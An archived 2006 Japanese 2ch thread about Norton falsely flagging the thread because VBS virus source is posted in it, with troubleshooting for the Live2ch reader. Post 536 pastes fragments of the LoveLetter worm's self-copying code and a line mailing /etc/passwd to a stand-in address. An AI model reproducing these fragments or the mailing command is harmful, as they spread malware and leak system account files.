ノートンがvbsウィルスのソースに誤反応３

[過去ﾛｸﾞ] ノートンがvbsウィルスのソースに誤反応３ (1002ﾚｽ)
上下前次 1-新

このｽﾚｯﾄﾞは過去ﾛｸﾞ倉庫に格納されています｡
次ｽﾚ検索歴削→次ｽﾚ栞削→次ｽﾚ過去ﾛｸﾞﾒﾆｭｰ

535: 2006/05/13(土)09:57 ID:??? AAS
AA省

536(1): 2006/05/15(月)14:24 ID:??? AAS
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

537: [age] 2006/05/19(金)20:06 ID:??? AAS
保守age

538(5): 2006/05/24(水)01:38 ID:uOt5d8a9(1/4) AAS
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか？

539: 2006/05/24(水)01:40 ID:??? AAS
AA省

540(3): ぴーこ名無しさん 2006/05/24(水)02:15 ID:??? AAS
>>538
2chｽﾚ:software
ログフォルダの指定を今一度確認してください。

以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
外部ﾘﾝｸ:service1.symantec.com
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」の右側に表示されているボタン、[レポートの表示] をクリックする。

541(1): 538 2006/05/24(水)02:24 ID:??? AAS
>>540
グミクズがさっさと教えろや

542(1): 538 2006/05/24(水)03:34 ID:uOt5d8a9(2/4) AAS
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね？
それとも止めといたほうがいいですか？（このファイルを削除しても意味無しですよね）
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね

543(2): 538 2006/05/24(水)03:39 ID:uOt5d8a9(3/4) AAS
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。

544(1): ぴーこ名無しさん 2006/05/24(水)04:07 ID:??? AAS
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。

注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。

545(1): ぴーこ名無しさん 2006/05/24(水)04:18 ID:??? AAS
>>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......

参考に
2chｽﾚ:software dat落ち
外部ﾘﾝｸ[html]:220.254.5.211:8000 ミラー

546(2): 538 2006/05/24(水)04:40 ID:uOt5d8a9(4/4) AAS
>>545
わざわざ再現までしていただき（しかもこんな夜中に）すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます！
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。

547: 2006/05/24(水)04:47 ID:??? AAS
>>546
俺も暇だからよー

548: 2006/05/24(水)13:46 ID:??? AAS
>>546
俺も暇だからよー

549: cen ◆Am9xOgNMYE NG NG AAS
こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。

550(1): cen ◆Am9xOgNMYE NG NG AAS
忘れてました。
こちらです。
外部ﾘﾝｸ[html]:www.geocities.jp

551: 2006/05/31(水)22:57 ID:??? AAS
bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな

552(2): 2006/06/01(木)00:54 ID:??? AAS
ダメですた
2chｽﾚ:mnewsplus
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな

553: cen ◆Am9xOgNMYE 2006/06/01(木)01:06 ID:??? AAS
>>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。

554(1): 2006/06/01(木)01:23 ID:??? AAS
どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要

上下前次 1-新書関写板覧索設栞歴

あと 448 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ AAｻﾑﾈｲﾙ

ぬこの手ぬこTOP 0.127s*